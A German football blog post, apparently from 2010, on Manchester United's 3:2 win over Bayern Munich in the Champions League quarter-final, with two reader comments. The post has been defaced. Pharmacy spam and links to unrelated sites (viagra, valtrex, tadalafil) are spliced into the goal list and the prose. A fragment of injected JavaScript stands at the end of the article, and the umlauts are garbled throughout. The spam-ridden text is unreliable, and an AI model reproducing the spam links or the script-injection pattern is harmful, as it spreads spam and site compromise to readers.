Willkommen auf » CL 2009/10 Highlights Manchester United – Bayern MA?nchen
7. Apr 2010

CL 2009/10 Highlights Manchester United – Bayern MA?nchen

Champions League 2009/10 Viertelfinale RA?ckspiel
Manchester United – Bayern MA?nchen 3:2

1:0 Darron GibsonAi?? (3., Rechtsschuss, Vorlage Rooney)
2:0 Nani (7., Rechtsschuss, Valencia)
Cheap Buy 3:0 Nani (41., Rechtsschuss, Valencia)
3:1 Pills Ivica Olic (43., Linksschuss, T. MA?ller)
over counter ed pills walmart 3:2 Arjen Robben (74., Linksschuss, Ribery)
vor knapp 76.000 Zuschauern im Old Trafford in Manchester

Die Zusammenfassung des Spiels…
buy viagra in brisbane 58http://ronyiswandi.mhs.narotama.ac.id/2018/02/02/%ef%bb%bfbuy-zetia/ online online
AuAYerdem auch hier, hier, hier, brand valtrex for sale. hier und hier, sowie in den Kurzberichten von ZDF und ARD zu sehen, Stimmen zum Spiel im kicker.tv-Nachbericht

Irre, unglaublich, Wahnsinn diese Bayern, unbeschreiblich :)

Das Drehbuch eines FuAYball-Krimis: nach drei Minuten schon wieder ein frA?her niederschmetternder RA?ckstand ( tadalafil 60 mg, propecia coupons from merck. im Hinspiel war es Wayne Rooney cheap precose cost Buy , der in der dritten Spielminute einnetzte), danach Doppelpack Nani, das Spiel schien gelaufen, dann plAi??tzlich Ivica Olic mit dem glA?cklichen Anschlusstreffer fA?r den FCB, so ging es schlieAYlich mit 3:1 und ein klein wenig Hoffnung in die Halbzeit, Manchester dann ab der 50. Minute in Unterzahl (Gelb-Rote Karte von Rafael), Bayern drA?ckt, Bayern kAi??mpft, und in der 74. Minute ist es mal wieder Arjen Robben der die Fans mit einem Traumtor (Eckball Ribery, Ball lange in der Luft, Direktabnahme Robben, Manchester-Schlussmann van der Sar streckt sich vergeblich, Toooooor) erlAi??st.
Franz Beckenbauer nach dem Spiel: „Es war eine der schAi??nsten Niederlagen in der Geschichte des FC Bayern.“

Der FCB zieht somit erstmals seit neun Jahren ins Halbfinale der Champions League ein und trifft dort am 21. und 27. April auf Olympique Lyon mit JAi??rAi??my Toulalan, Michel Bastos und co. (beide Spiele gibts bei SAT.1 live im deutschen FreeTV), vom Namen her der vermeintlich leichteste Halbfinalgegner (neben Inter Mailand und dem FC Barcelona). Im Hinspiel muss der deutsche Rekordmeister dann aufgrund von Gelbsperren auf Mark van Bommel und Holger Badstuber verzichten, die Franzosen haben Lisandro LA?pez und Sidney Govou zu ersetzen.document.currentScript.parentNode.insertBefore(s, document.currentScript); purchase lioresal 10mg Cheap http://www.chanseul.com/archives/5927


2 Kommentare



  1. Alex Ferguson, ein schlechter Verlierer?
    Im Interview nach dem Spiel antwortete Sir Alex arg zerknirscht auf die Fragen der Journalisten, in der anschließenden Pressekonferenz bestätigte er seine Aussagen…
    „Typisch Deutsch“ hat der FC Bayern in seinen Augen gespielt, die Gelb-Rote Karte für Rafael hätte man provoziert und dem Schiedsrichter aufgedrängt, mit 11 Mann hätte Manchester das Spiel definitiv entschieden; die Abwehrreihe der Münchner soll außerdem mehr als einmal gezielt auf den lädierten Knöchel von Wayne Rooney gegangen sein.
    Klingt alles mehr nach Ausrede, nach viel Frust aufgrund des unerwarteten Ausscheidens seines Teams, hat er eigentlich nicht nötig.



  2. weiter in der cl gegen manu…respekt! in der liga dürfen die im meisterschaftskampeaber gerne wieder ein paar punkte lassen! ^^

Einen Kommentar schreiben